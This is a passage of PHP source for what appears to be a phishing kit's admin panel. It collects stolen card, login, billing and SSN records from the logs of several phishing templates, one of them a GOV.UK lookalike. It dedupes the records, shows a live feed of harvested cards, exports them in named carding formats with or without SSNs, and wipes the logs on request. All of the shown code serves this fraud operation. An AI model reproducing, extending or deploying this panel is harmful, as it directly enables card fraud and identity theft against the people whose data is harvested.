            $seenHashes = [];
            foreach ($lines as $line) {
                $hash = md5(trim($line));
                if (!isset($seenHashes[$hash])) {
                    $seenHashes[$hash] = true;
                    $uniqueLines[] = $line;
                }
            }
            
            $result['unique'] = count($uniqueLines);
            $result['removed'] = $result['original'] - $result['unique'];
            
            // Write back
            file_put_contents($webshopPath, implode(PHP_EOL, $uniqueLines) . PHP_EOL);
        }
    }
    
    header('Location: webshop.php?webshop_cleaned=1&original=' . $result['original'] . '&unique=' . $result['unique'] . '&removed=' . $result['removed'] . '&backup=' . urlencode($result['backup']));
    exit;
}

// Handle Purge All
if (isset($_POST['clear_all_logs']) && $_POST['clear_all_logs'] === 'yes') {
    @set_time_limit(120);
    $deletedFiles = 0;
    
    // Clear all template logs
    foreach ($templateFolders as $folder => $name) {
        $logDir = $basePath . '/' . $folder . '/logs';
        if (is_dir($logDir)) {
            $txtFiles = glob($logDir . '/*.txt');
            foreach ($txtFiles as $txtFile) {
                $filename = basename($txtFile);
                if ($filename !== '.htaccess' && $filename !== 'index.php') {
                    @unlink($txtFile);
                    $deletedFiles++;
                }
            }
        }
    }
    
    // ALSO clear central webshop.txt
    $centralWebshop = __DIR__ . '/webshop.txt';
    if (file_exists($centralWebshop)) {
        @file_put_contents($centralWebshop, '');
        $deletedFiles++;
    }
    
    header('Location: webshop.php?cleared=1&count=' . $deletedFiles);
    exit;
}

// NOW include header (after all redirects are handled)
require_once 'include/header.php';

// Collect all CC data from templates
$allCCData = [];
$byTemplate = [];
$totalFileSize = 0;

foreach ($templateFolders as $folder => $name) {
    $templateDir = $basePath . '/' . $folder;
    if (!is_dir($templateDir)) continue;
    
    $logPaths = [
        $templateDir . '/logs/data_webshop_logs.txt',
    ];
    
    $templateCount = 0;
    
    foreach ($logPaths as $logPath) {
        if (file_exists($logPath) && filesize($logPath) > 0) {
            $totalFileSize += filesize($logPath);
            $logLines = @file($logPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
            if ($logLines) {
                $logTime = filemtime($logPath);
                foreach ($logLines as $line) {
                    $cleanLine = cleanWebshopLineDownload($line);
                    if ($cleanLine !== null) {
                        $allCCData[] = [
                            'source' => $folder,
                            'template' => $name,
                            'data' => $cleanLine,
                            'time' => $logTime,
                        ];
                        $templateCount++;
                    }
                }
            }
        }
    }
    
    if ($templateCount > 0) {
        $byTemplate[$name] = $templateCount;
    }
}

// Also read from MaIMTt67dp/etmin/logs/ (nested etmin folder)
$nestedEtminPath = $basePath . '/MaIMTt67dp/etmin/logs/data_webshop_logs.txt';
if (file_exists($nestedEtminPath) && filesize($nestedEtminPath) > 0) {
    $totalFileSize += filesize($nestedEtminPath);
    $logLines = @file($nestedEtminPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if ($logLines) {
        $logTime = filemtime($nestedEtminPath);
        $nestedCount = 0;
        foreach ($logLines as $line) {
            $cleanLine = cleanWebshopLineDownload($line);
            if ($cleanLine !== null) {
                $allCCData[] = [
                    'source' => 'MaIMTt67dp/etmin',
                    'template' => 'Etmin (Govuk)',
                    'data' => $cleanLine,
                    'time' => $logTime,
                ];
                $nestedCount++;
            }
        }
        if ($nestedCount > 0) {
            $byTemplate['Etmin (Govuk)'] = ($byTemplate['Etmin (Govuk)'] ?? 0) + $nestedCount;
        }
    }
}

// Also read from central webshop.txt (primary source for new cards)
$centralWebshop = __DIR__ . '/webshop.txt';
if (file_exists($centralWebshop) && filesize($centralWebshop) > 0) {
    $totalFileSize += filesize($centralWebshop);
    $logLines = @file($centralWebshop, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if ($logLines) {
        $logTime = filemtime($centralWebshop);
        $centralCount = 0;
        foreach ($logLines as $line) {
            $cleanLine = cleanWebshopLineDownload($line);
            if ($cleanLine !== null) {
                $allCCData[] = [
                    'source' => 'central',
                    'template' => 'Central Webshop',
                    'data' => $cleanLine,
                    'time' => $logTime,
                ];
                $centralCount++;
            }
        }
        if ($centralCount > 0) {
            $byTemplate['Central Webshop'] = $centralCount;
        }
    }
}

// Sort by time and remove duplicates
usort($allCCData, function($a, $b) { return $b['time'] - $a['time']; });

$uniqueData = [];
$seen = [];
foreach ($allCCData as $item) {
    $hash = md5($item['data']);
    if (!isset($seen[$hash])) {
        $seen[$hash] = true;
        $uniqueData[] = $item;
    }
}
$allCCData = $uniqueData;
$lineCount = count($allCCData);

// Collect additional stats (Login, Billing, Card1, Card2)
$totalLogin = 0;
$totalBilling = 0;
$totalCard1 = 0;
$totalCard2 = 0;

foreach ($templateFolders as $folder => $name) {
    $logsDir = $basePath . '/' . $folder . '/logs/';
    if (!is_dir($logsDir)) continue;
    
    // Login count
    $loginFile = $logsDir . 'login.txt';
    if (file_exists($loginFile)) {
        $loginLines = @file($loginFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        if ($loginLines) $totalLogin += count($loginLines);
    }
    
    // Billing count
    $billingFile = $logsDir . 'billing.txt';
    if (file_exists($billingFile)) {
        $billingLines = @file($billingFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        if ($billingLines) $totalBilling += count($billingLines);
    }
    
    // Card1 count
    $card1File = $logsDir . 'card1.txt';
    if (file_exists($card1File)) {
        $card1Lines = @file($card1File, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        if ($card1Lines) $totalCard1 += count($card1Lines);
    }
    
    // Card2 count
    $card2File = $logsDir . 'card2.txt';
    if (file_exists($card2File)) {
        $card2Lines = @file($card2File, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        if ($card2Lines) $totalCard2 += count($card2Lines);
    }
}

// Check for alerts
$cleared = isset($_GET['cleared']) && $_GET['cleared'] == '1';
$duplicatesCleaned = isset($_GET['cleaned']) && $_GET['cleaned'] == '1';
$deepCleaned = isset($_GET['deep_cleaned']) && $_GET['deep_cleaned'] == '1';
$webshopCleaned = isset($_GET['webshop_cleaned']) && $_GET['webshop_cleaned'] == '1';
?>

<?php include 'include/sidebar.php'; ?>

<style>
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700;900&family=JetBrains+Mono:wght@400;500&display=swap');
@import url('https://fonts.googleapis.com/css2?family=Orbitron:wght@400;500;600;700;800;900&display=swap');

:root {
    --bg-dark: #0a0a0f;
    --bg-card: rgba(20, 20, 25, 0.6);
    --bg-card-hover: rgba(30, 30, 40, 0.8);
    --border: rgba(255, 255, 255, 0.08);
    --border-hover: rgba(255, 255, 255, 0.2);
    --text: #e8e8ec;
    --text-dim: #8a8a9a;
    --accent-green: #00ff9d;
    --accent-cyan: #00d4ff;
    --accent-purple: #a855f7;
    --accent-pink: #ff0080;
    --accent-orange: #ff9500;
    --accent-red: #ff4757;
    --accent-yellow: #ffd700;
    --glow-green: 0 0 20px rgba(0, 255, 157, 0.3);
}

body {
    background: #050508;
    font-family: 'Roboto', -apple-system, BlinkMacSystemFont, sans-serif;
    color: var(--text);
    min-height: 100vh;
    position: relative;
}

body::before {
    content: '';
    position: fixed;
    top: 0; left: 0;
    width: 100%; height: 100%;
    background: 
        radial-gradient(900px ellipse at 15% 5%, rgba(0, 255, 157, 0.2), transparent 50%),
        radial-gradient(700px ellipse at 85% 20%, rgba(0, 212, 255, 0.18), transparent 50%),
        radial-gradient(600px ellipse at 75% 90%, rgba(168, 85, 247, 0.15), transparent 50%),
        radial-gradient(500px ellipse at 25% 80%, rgba(255, 215, 0, 0.1), transparent 50%);
    z-index: -2;
    animation: auroraShift 26s ease-in-out infinite alternate;
}

body::after {
    content: '';
    position: fixed;
    top: 0; left: 0;
    width: 100%; height: 100%;
    background: 
        radial-gradient(350px circle at 20% 15%, rgba(0, 255, 157, 0.12), transparent 60%),
        radial-gradient(300px circle at 80% 30%, rgba(0, 212, 255, 0.1), transparent 60%),
        radial-gradient(280px circle at 65% 75%, rgba(168, 85, 247, 0.08), transparent 60%);
    z-index: -1;
    animation: orbFloat 18s ease-in-out infinite alternate-reverse;
    pointer-events: none;
}

@keyframes auroraShift {
    0% { transform: scale(1); filter: blur(80px) brightness(1); }
    100% { transform: scale(1.08); filter: blur(88px) brightness(1.12); }
}

@keyframes orbFloat {
    0% { transform: translateY(0) translateX(0); }
    100% { transform: translateY(-12px) translateX(8px); }
}

/* WebShop Specific Styles */
.webshop-hero {
    padding: 40px 0 30px;
    text-align: center;
    position: relative;
}

.webshop-hero::before {
    content: '';
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    width: 600px;
    height: 300px;
    background: radial-gradient(circle, rgba(0, 255, 157, 0.15), transparent 70%);
    filter: blur(60px);
    pointer-events: none;
    z-index: -1;
}

.hero-badge {
    display: inline-flex;
    align-items: center;
    gap: 8px;
    padding: 8px 20px;
    background: rgba(0, 255, 157, 0.1);
    border: 1px solid rgba(0, 255, 157, 0.3);
    border-radius: 50px;
    font-family: 'JetBrains Mono', monospace;
    font-size: 0.7rem;
    font-weight: 700;
    color: var(--accent-green);
    text-transform: uppercase;
    letter-spacing: 2px;
    margin-bottom: 25px;
    box-shadow: 0 0 20px rgba(0, 255, 157, 0.2);
}

.hero-badge::before {
    content: '';
    width: 8px;
    height: 8px;
    background: var(--accent-green);
    border-radius: 50%;
    animation: pulse 2s ease-in-out infinite;
    box-shadow: 0 0 10px var(--accent-green);
}

@keyframes pulse {
    0%, 100% { opacity: 1; transform: scale(1); }
    50% { opacity: 0.5; transform: scale(0.8); }
}

.hero-title {
    font-family: 'Orbitron', sans-serif;
    font-size: 3rem;
    font-weight: 900;
    line-height: 1.1;
    margin-bottom: 20px;
    text-transform: uppercase;
    letter-spacing: 2px;
    text-shadow: 0 0 20px rgba(0, 255, 157, 0.3);
}

.hero-title .highlight {
    background: linear-gradient(135deg, var(--accent-green), var(--accent-cyan));
    -webkit-background-clip: text;
    -webkit-text-fill-color: transparent;
}

.hero-title .accent {
    color: var(--accent-pink);
    font-size: 0.5em;
    vertical-align: top;
}

.hero-desc {
    font-size: 1rem;
    color: var(--text-dim);
    margin-bottom: 30px;
    max-width: 700px;
    margin-left: auto;
    margin-right: auto;
    line-height: 1.6;
}

.hero-buttons {
    display: flex;
    gap: 15px;
    flex-wrap: wrap;
    justify-content: center;
    margin-bottom: 40px;
}

.btn-cyber {
    display: inline-flex;
    align-items: center;
    gap: 10px;
    padding: 12px 24px;
    border-radius: 8px;
    font-family: 'JetBrains Mono', monospace;
    font-size: 0.8rem;
    font-weight: 700;
    text-decoration: none;
    text-transform: uppercase;
    letter-spacing: 1px;
    border: 1px solid;
    cursor: pointer;
    transition: all 0.3s;
    backdrop-filter: blur(5px);
}

.btn-green {
    background: linear-gradient(135deg, rgba(0, 255, 157, 0.2), rgba(0, 212, 255, 0.2));
    color: #fff;
    border-color: var(--accent-green);
    box-shadow: 0 0 20px rgba(0, 255, 157, 0.2);
}

.btn-green:hover {
    box-shadow: 0 0 40px rgba(0, 255, 157, 0.4);
    transform: translateY(-2px);
    background: rgba(0, 255, 157, 0.3);
}

.btn-cyan {
    background: rgba(0, 212, 255, 0.1);
    color: var(--accent-cyan);
    border-color: rgba(0, 212, 255, 0.5);
}

.btn-cyan:hover {
    background: rgba(0, 212, 255, 0.2);
    box-shadow: 0 0 20px rgba(0, 212, 255, 0.3);
    transform: translateY(-2px);
}

.btn-yellow {
    background: rgba(255, 215, 0, 0.1);
    color: var(--accent-yellow);
    border-color: rgba(255, 215, 0, 0.5);
}

.btn-yellow:hover {
    background: rgba(255, 215, 0, 0.2);
    box-shadow: 0 0 20px rgba(255, 215, 0, 0.3);
    transform: translateY(-2px);
}

.btn-red {
    background: rgba(255, 71, 87, 0.1);
    color: var(--accent-red);
    border-color: rgba(255, 71, 87, 0.5);
}

.btn-red:hover {
    background: rgba(255, 71, 87, 0.2);
    box-shadow: 0 0 20px rgba(255, 71, 87, 0.3);
    transform: translateY(-2px);
}

.btn-magenta {
    background: rgba(255, 0, 128, 0.1);
    color: var(--accent-pink);
    border-color: rgba(255, 0, 128, 0.5);
}

.btn-magenta:hover {
    background: rgba(255, 0, 128, 0.2);
    box-shadow: 0 0 20px rgba(255, 0, 128, 0.3);
    transform: translateY(-2px);
}

.btn-purple {
    background: rgba(168, 85, 247, 0.1);
    color: var(--accent-purple);
    border-color: rgba(168, 85, 247, 0.5);
}

.btn-purple:hover {
    background: rgba(168, 85, 247, 0.2);
    box-shadow: 0 0 20px rgba(168, 85, 247, 0.3);
    transform: translateY(-2px);
}

.btn-skyblue {
    background: rgba(0, 200, 255, 0.1);
    color: #00c8ff;
    border-color: rgba(0, 200, 255, 0.5);
}

.btn-skyblue:hover {
    background: rgba(0, 200, 255, 0.2);
    box-shadow: 0 0 20px rgba(0, 200, 255, 0.3);
    transform: translateY(-2px);
}

/* Stats Grid */
.stats-cyber {
    display: grid;
    grid-template-columns: repeat(4, 1fr);
    gap: 20px;
    margin-top: 30px;
    max-width: 1200px;
    margin-left: auto;
    margin-right: auto;
}

.stat-cyber {
    background: var(--bg-card);
    border: 1px solid var(--border);
    border-radius: 16px;
    padding: 20px;
    transition: all 0.3s;
    backdrop-filter: blur(10px);
    position: relative;
    overflow: hidden;
}

.stat-cyber:hover {
    transform: translateY(-5px);
    border-color: var(--accent-green);
    box-shadow: 0 10px 40px rgba(0, 255, 157, 0.15);
}

.stat-cyber-icon {
    width: 42px;
    height: 42px;
    background: rgba(0, 255, 157, 0.1);
    border: 1px solid rgba(0, 255, 157, 0.2);
    border-radius: 10px;
    display: flex;
    align-items: center;
    justify-content: center;
    margin-bottom: 12px;
    font-size: 1.2rem;
    color: var(--accent-green);
}

.stat-cyber:nth-child(2) .stat-cyber-icon {
    background: rgba(255, 0, 128, 0.1);
    border-color: rgba(255, 0, 128, 0.2);
    color: var(--accent-pink);
}

.stat-cyber:nth-child(3) .stat-cyber-icon {
    background: rgba(0, 212, 255, 0.1);
    border-color: rgba(0, 212, 255, 0.2);
    color: var(--accent-cyan);
}

.stat-cyber:nth-child(4) .stat-cyber-icon {
    background: rgba(255, 215, 0, 0.1);
    border-color: rgba(255, 215, 0, 0.2);
    color: var(--accent-yellow);
}

.stat-cyber-label {
    font-family: 'JetBrains Mono', monospace;
    font-size: 0.7rem;
    color: var(--text-dim);
    text-transform: uppercase;
    letter-spacing: 1px;
    margin-bottom: 6px;
}

.stat-cyber-value {
    font-family: 'Orbitron', sans-serif;
    font-size: 1.8rem;
    font-weight: 800;
    color: var(--text);
    text-shadow: 0 0 10px rgba(255,255,255,0.3);
}

.stat-cyber-sub {
    font-size: 0.7rem;
    color: var(--text-dim);
    margin-top: 4px;
}

/* Action Reference */
.action-ref {
    margin-top: 30px;
    padding: 25px;
    background: var(--bg-card);
    border-radius: 16px;
    border: 1px solid var(--border);
    backdrop-filter: blur(10px);
}

.action-ref-title {
    font-family: 'Orbitron', sans-serif;
    font-size: 0.8rem;
    color: var(--accent-cyan);
    margin-bottom: 20px;
    text-transform: uppercase;
    letter-spacing: 2px;
    display: flex;
    align-items: center;
    gap: 10px;
}

.action-grid {
    display: grid;
    grid-template-columns: repeat(auto-fit, minmax(300px, 1fr));
    gap: 20px;
}

.action-item {
    padding: 15px;
    border-radius: 12px;
    background: rgba(255,255,255,0.03);
    border: 1px solid var(--border);
    border-left: 3px solid;
    transition: 0.3s;
}

.action-item:hover {
    background: rgba(255,255,255,0.05);
    transform: translateX(5px);
}

.action-item.green { border-left-color: var(--accent-green); }
.action-item.cyan { border-left-color: var(--accent-cyan); }
.action-item.yellow { border-left-color: var(--accent-yellow); }
.action-item.red { border-left-color: var(--accent-red); }
.action-item.magenta { border-left-color: var(--accent-pink); }
.action-item.purple { border-left-color: var(--accent-purple); }
.action-item.skyblue { border-left-color: #00c8ff; }

.action-item strong {
    display: block;
    margin-bottom: 6px;
    font-size: 0.85rem;
}

.action-item.green strong { color: var(--accent-green); }
.action-item.cyan strong { color: var(--accent-cyan); }
.action-item.yellow strong { color: var(--accent-yellow); }
.action-item.red strong { color: var(--accent-red); }
.action-item.magenta strong { color: var(--accent-pink); }
.action-item.purple strong { color: var(--accent-purple); }
.action-item.skyblue strong { color: #00c8ff; }

.action-item p {
    color: var(--text);
    font-size: 0.8rem;
    margin: 0 0 8px 0;
}

.action-item ul {
    color: var(--text-dim);
    margin: 0;
    padding-left: 15px;
    font-size: 0.75rem;
}

/* Live Feed */
.live-feed {
    background: var(--bg-dark);
    border: 1px solid var(--border);
    border-radius: 12px;
    max-height: 400px;
    overflow-y: auto;
    font-family: 'JetBrains Mono', monospace;
}

.feed-line {
    padding: 12px 16px;
    border-bottom: 1px solid var(--border);
    font-size: 0.75rem;
    color: var(--accent-green);
    word-break: break-all;
    transition: background 0.2s;
    display: flex;
    align-items: center;
}

.feed-line:hover {
    background: rgba(0, 255, 157, 0.05);
}

.feed-line:before {
    content: '>';
    margin-right: 10px;
    color: var(--text-dim);
}

/* Template Distribution */
.template-grid {
    display: grid;
    grid-template-columns: repeat(auto-fill, minmax(140px, 1fr));
    gap: 15px;
}

.template-item {
    padding: 20px;
    background: var(--bg-card);
    border: 1px solid var(--border);
    border-radius: 16px;
    text-align: center;
    transition: all 0.3s;
    cursor: pointer;
}

.template-item:hover {
    border-color: var(--accent-green);
    background: rgba(0, 255, 157, 0.05);
    transform: translateY(-5px);
    box-shadow: 0 10px 30px rgba(0,0,0,0.3);
}

.template-item i {
    font-size: 1.8rem;
    color: var(--accent-green);
    margin-bottom: 10px;
    display: block;
    filter: drop-shadow(0 0 5px rgba(0, 255, 157, 0.3));
}

.template-name {
    font-size: 0.7rem;
    color: var(--text-dim);
    text-transform: uppercase;
    margin-bottom: 6px;
    letter-spacing: 1px;
}

.template-count {
    font-family: 'Orbitron', sans-serif;
    font-size: 1.4rem;
    font-weight: 800;
    color: var(--text);
}

/* Status Live */
.status-live {
    display: flex;
    align-items: center;
    gap: 8px;
    font-family: 'JetBrains Mono', monospace;
    font-size: 0.7rem;
    color: var(--accent-green);
    text-transform: uppercase;
    background: rgba(0, 255, 157, 0.1);
    padding: 4px 10px;
    border-radius: 20px;
    border: 1px solid rgba(0, 255, 157, 0.2);
}

.status-live::before {
    content: '';
    width: 6px;
    height: 6px;
    background: var(--accent-green);
    border-radius: 50%;
    animation: pulse 1.5s ease-in-out infinite;
    box-shadow: 0 0 8px var(--accent-green);
}

/* Format Reference */
.format-ref {
    margin-top: 20px;
    padding: 15px;
    background: rgba(0, 0, 0, 0.3);
    border-radius: 10px;
    border: 1px dashed var(--border);
}

.format-ref code {
    display: block;
    color: var(--accent-cyan);
    font-size: 0.75rem;
    word-break: break-all;
    line-height: 1.6;
    padding: 10px;
    background: rgba(0,0,0,0.3);
    border-radius: 6px;
}

.format-ref .yellow { color: var(--accent-yellow); }

/* Card Styles */
.card {
    background: var(--bg-card);
    border: 1px solid var(--border);
    border-radius: 16px;
    margin-bottom: 30px;
    overflow: hidden;
    backdrop-filter: blur(10px);
}

.card-header {
    padding: 20px 25px;
    border-bottom: 1px solid var(--border);
    display: flex;
    align-items: center;
    justify-content: space-between;
    background: rgba(255,255,255,0.02);
}

.card-title {
    font-size: 1rem;
    font-weight: 700;
    color: var(--text);
    display: flex;
    align-items: center;
    gap: 10px;
    text-transform: uppercase;
    letter-spacing: 1px;
}

.card-body {
    padding: 25px;
}

@media (max-width: 768px) {
    .stats-cyber { grid-template-columns: repeat(2, 1fr); }
    .hero-title { font-size: 2rem; }
    .hero-buttons { flex-direction: column; width: 100%; }
    .btn-cyber { width: 100%; justify-content: center; }
}
</style>

<div class="main-content">
    <?php if ($cleared): ?>
    <div style="background: rgba(0, 255, 136, 0.15); border: 1px solid rgba(0, 255, 136, 0.3); color: var(--accent-green); padding: 12px 20px; border-radius: 10px; margin-bottom: 20px; display: flex; align-items: center; gap: 10px;">
        <i class="bi bi-check-circle"></i> Successfully cleared <?= intval($_GET['count'] ?? 0) ?> log files!
    </div>
    <?php endif; ?>
    
    <?php if ($duplicatesCleaned): ?>
    <div style="background: rgba(0, 212, 255, 0.15); border: 1px solid rgba(0, 212, 255, 0.3); color: var(--accent-cyan); padding: 12px 20px; border-radius: 10px; margin-bottom: 20px;">
        <i class="bi bi-check-circle"></i> Cleanup completed! Files: <?= $_GET['files'] ?? 0 ?> | Original: <?= $_GET['original'] ?? 0 ?> | Unique: <?= $_GET['unique'] ?? 0 ?> | Removed: <?= $_GET['removed'] ?? 0 ?>
    </div>
    <?php endif; ?>

    <!-- Page Header -->
    <div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 25px; flex-wrap: wrap; gap: 15px;">
        <div>
            <h1 style="font-size: 1.5rem; font-weight: 700; margin: 0; display: flex; align-items: center; gap: 10px;">
                <i class="bi bi-credit-card" style="color: var(--accent-green);"></i> WebShop
            </h1>
            <p style="font-size: 0.75rem; color: var(--text-dim); margin-top: 4px;">Card & CC Data Management</p>
        </div>
        <div style="display: flex; gap: 10px; flex-wrap: wrap;">
            <a href="?download=txt" class="btn-cyber btn-green"><i class="bi bi-download"></i> Download All</a>
            <a href="?download=clean_all" class="btn-cyber btn-cyan"><i class="bi bi-file-earmark-text"></i> Clean Export</a>
        </div>
    </div>

    <!-- Stats -->
    <div class="stats-cyber">
        <div class="stat-cyber">
            <div class="stat-cyber-icon"><i class="bi bi-credit-card-2-front"></i></div>
            <div class="stat-cyber-value"><?= number_format($lineCount) ?></div>
            <div class="stat-cyber-label">Total Cards</div>
        </div>
        <div class="stat-cyber">
            <div class="stat-cyber-icon" style="background: rgba(0, 212, 255, 0.1); color: var(--accent-cyan);"><i class="bi bi-layers"></i></div>
            <div class="stat-cyber-value" style="color: var(--accent-cyan);"><?= count($byTemplate) ?></div>
            <div class="stat-cyber-label">Templates</div>
        </div>
        <div class="stat-cyber">
            <div class="stat-cyber-icon" style="background: rgba(168, 85, 247, 0.1); color: var(--accent-purple);"><i class="bi bi-hdd"></i></div>
            <div class="stat-cyber-value" style="color: var(--accent-purple);"><?= number_format($totalFileSize / 1024, 1) ?> KB</div>
            <div class="stat-cyber-label">File Size</div>
        </div>
        <div class="stat-cyber">
            <div class="stat-cyber-icon" style="background: rgba(255, 215, 0, 0.1); color: var(--accent-yellow);"><i class="bi bi-clock-history"></i></div>
            <div class="stat-cyber-value" style="color: var(--accent-yellow);"><?= date('H:i') ?></div>
            <div class="stat-cyber-label">Last Update</div>
        </div>
    </div>
    
    <!-- Additional Stats: Login, Billing, Card1, Card2 -->
    <div class="stats-cyber" style="margin-top: 15px;">
        <div class="stat-cyber">
            <div class="stat-cyber-icon" style="background: rgba(145, 70, 255, 0.1); color: #9146ff;"><i class="bi bi-box-arrow-in-right"></i></div>
            <div class="stat-cyber-value" style="color: #9146ff;"><?= number_format($totalLogin) ?></div>
            <div class="stat-cyber-label">LOGIN</div>
        </div>
        <div class="stat-cyber">
            <div class="stat-cyber-icon" style="background: rgba(255, 165, 0, 0.1); color: #ffa500;"><i class="bi bi-receipt"></i></div>
            <div class="stat-cyber-value" style="color: #ffa500;"><?= number_format($totalBilling) ?></div>
            <div class="stat-cyber-label">BILLING</div>
        </div>
        <div class="stat-cyber">
            <div class="stat-cyber-icon" style="background: rgba(0, 191, 255, 0.1); color: #00bfff;"><i class="bi bi-credit-card-2-front"></i></div>
            <div class="stat-cyber-value" style="color: #00bfff;"><?= number_format($totalCard1) ?></div>
            <div class="stat-cyber-label">CARD 1</div>
        </div>
        <div class="stat-cyber">
            <div class="stat-cyber-icon" style="background: rgba(255, 105, 180, 0.1); color: #ff69b4;"><i class="bi bi-credit-card-2-back"></i></div>
            <div class="stat-cyber-value" style="color: #ff69b4;"><?= number_format($totalCard2) ?></div>
            <div class="stat-cyber-label">CARD 2</div>
        </div>
        <div class="stat-cyber">
            <div class="stat-cyber-icon" style="background: rgba(50, 205, 50, 0.1); color: #32cd32;"><i class="bi bi-cart-check"></i></div>
            <div class="stat-cyber-value" style="color: #32cd32;"><?= number_format($lineCount) ?></div>
            <div class="stat-cyber-label">WEBSHOP</div>
        </div>
    </div>

    <!-- ========================================== -->
    <!-- EXPORT & TOOLS -->
    <!-- ========================================== -->
    <div class="card" style="margin-top: 25px;">
        <div class="card-header" style="background: linear-gradient(135deg, rgba(0, 200, 255, 0.2), rgba(168, 85, 247, 0.2));">
            <span class="card-title" style="color: #00c8ff;"><i class="bi bi-download"></i> EXPORT & TOOLS</span>
        </div>
        <div class="card-body">
            <!-- BRIANS FORMAT -->
            <div style="margin-bottom: 20px;">
                <h4 style="color: #00c8ff; margin-bottom: 8px; font-size: 0.95rem;"><i class="bi bi-file-earmark-ruled"></i> BRIANS FORMAT</h4>
                <p style="color: var(--text-dim); font-size: 0.75rem; margin-bottom: 10px;">card|mm|yy|cvv|name|address|city|state|zip|country|phone|email|dob|ssn|ip|ua|</p>
                <div style="display: flex; flex-wrap: wrap; gap: 10px;">
                    <a href="?download=brians_no_ssn" class="btn-cyber btn-skyblue" onclick="return confirm('Brians No SSN?')">
                        <i class="bi bi-download"></i> No SSN
                    </a>
                    <a href="?download=brians_ssn" class="btn-cyber btn-green" onclick="return confirm('Brians With SSN?')">
                        <i class="bi bi-download"></i> With SSN
                    </a>
                </div>
            </div>
            
            <hr style="border-color: rgba(255,255,255,0.1); margin: 15px 0;">
            
            <!-- CERBERUX FORMAT -->
            <div style="margin-bottom: 15px;">
                <h4 style="color: #a855f7; margin-bottom: 8px; font-size: 0.95rem;"><i class="bi bi-shield-shaded"></i> CERBERUX FORMAT</h4>
                <p style="color: var(--text-dim); font-size: 0.75rem; margin-bottom: 10px;">card|mm|yy|cvv|name|address|city|state|zip|country|phone|dob|ssn|email|ip|ua|</p>
                <div style="display: flex; flex-wrap: wrap; gap: 10px;">
                    <a href="?download=cerberux_no_ssn" class="btn-cyber btn-purple" onclick="return confirm('Cerberux No SSN?')">
                        <i class="bi bi-download"></i> No SSN
                    </a>
                    <a href="?download=cerberux_ssn" class="btn-cyber btn-magenta" onclick="return confirm('Cerberux With SSN?')">
                        <i class="bi bi-download"></i> With SSN
                    </a>
                </div>
            </div>
            
            <div style="font-size: 0.7rem; color: var(--text-dim); line-height: 1.6;">
                Remove duplicate by card number &bull; Field kosong = || &bull; SSN kosong di No SSN = ||
            </div>
        </div>
    </div>
    
    <!-- ========================================== -->
    <!-- DANGER ZONE -->
    <!-- ========================================== -->
    <div class="card" style="margin-top: 25px;">
        <div class="card-header" style="background: linear-gradient(135deg, rgba(255, 71, 87, 0.3), rgba(255, 0, 0, 0.1));">
            <span class="card-title" style="color: #ff4757;"><i class="bi bi-exclamation-triangle"></i> DANGER ZONE</span>
        </div>
        <div class="card-body">
            <div style="display: flex; align-items: center; gap: 15px;">
                <form method="POST" style="display: inline;">
                    <input type="hidden" name="clear_all_logs" value="yes">
                    <button type="submit" class="btn-cyber btn-red" onclick="return confirm('⚠️ HAPUS SEMUA DATA? Tidak bisa di-undo!')">
                        <i class="bi bi-trash3"></i> Clear All Data
                    </button>
                </form>
                <span style="color: var(--text-dim); font-size: 0.8rem;">Hapus semua data kartu dari log (tidak bisa dikembalikan)</span>
            </div>
        </div>
    </div>

    <!-- Template Distribution -->
    <?php if (!empty($byTemplate)): ?>
    <div class="card">
        <div class="card-header">
            <span class="card-title"><i class="bi bi-pie-chart"></i> By Template</span>
        </div>
        <div class="card-body">
            <div class="template-grid">
                <?php foreach ($byTemplate as $tplName => $count): ?>
                <div class="template-item">
                    <i class="bi bi-folder2-open"></i>
                    <div class="template-name"><?= htmlspecialchars($tplName) ?></div>
                    <div class="template-count"><?= number_format($count) ?></div>
                </div>
                <?php endforeach; ?>
            </div>
        </div>
    </div>
    <?php endif; ?>

    <!-- Live Data Feed -->
    <div class="card">
        <div class="card-header">
            <span class="card-title"><i class="bi bi-terminal"></i> Live Data Feed</span>
            <span class="status-live">LIVE</span>
        </div>
        <div class="card-body" style="padding: 0;">
            <div class="live-feed">
                <?php if (empty($allCCData)): ?>
                <div style="padding: 40px; text-align: center; color: var(--text-dim);">
                    <i class="bi bi-inbox" style="font-size: 3rem; opacity: 0.3; display: block; margin-bottom: 15px;"></i>
                    <p>No card data available</p>
                </div>
                <?php else: ?>
                <?php 
                $displayData = array_slice($allCCData, 0, 50); // Show first 50
                foreach ($displayData as $item): 
                    $parts = explode('|', $item['data']);
                    $masked = isset($parts[0]) ? substr($parts[0], 0, 6) . '******' . substr($parts[0], -4) : 'N/A';
                ?>
                <div class="feed-line">
                    <span style="color: var(--accent-cyan); margin-right: 10px;">[<?= htmlspecialchars($item['template']) ?>]</span>
                    <span style="color: var(--accent-green);"><?= $masked ?></span>
                    <span style="margin-left: auto; color: var(--text-dim); font-size: 0.65rem;"><?= date('Y-m-d H:i', $item['time']) ?></span>
                </div>
                <?php endforeach; ?>
                <?php if (count($allCCData) > 50): ?>
                <div style="padding: 15px; text-align: center; color: var(--text-dim); font-size: 0.75rem; border-top: 1px solid var(--border);">
                    Showing 50 of <?= number_format(count($allCCData)) ?> entries. <a href="?download=txt" style="color: var(--accent-green);">Download all</a>
                </div>
                <?php endif; ?>
                <?php endif; ?>
            </div>
        </div>
    </div>

    <!-- Format Reference -->
    <div class="card">
        <div class="card-header">
            <span class="card-title"><i class="bi bi-info-circle"></i> Data Format & Penjelasan</span>
        </div>
        <div class="card-body">
            <div class="format-ref">
                <p style="color: var(--text-dim); font-size: 0.8rem; margin-bottom: 15px;">Format data card menggunakan separator pipe (|):</p>
                <code>
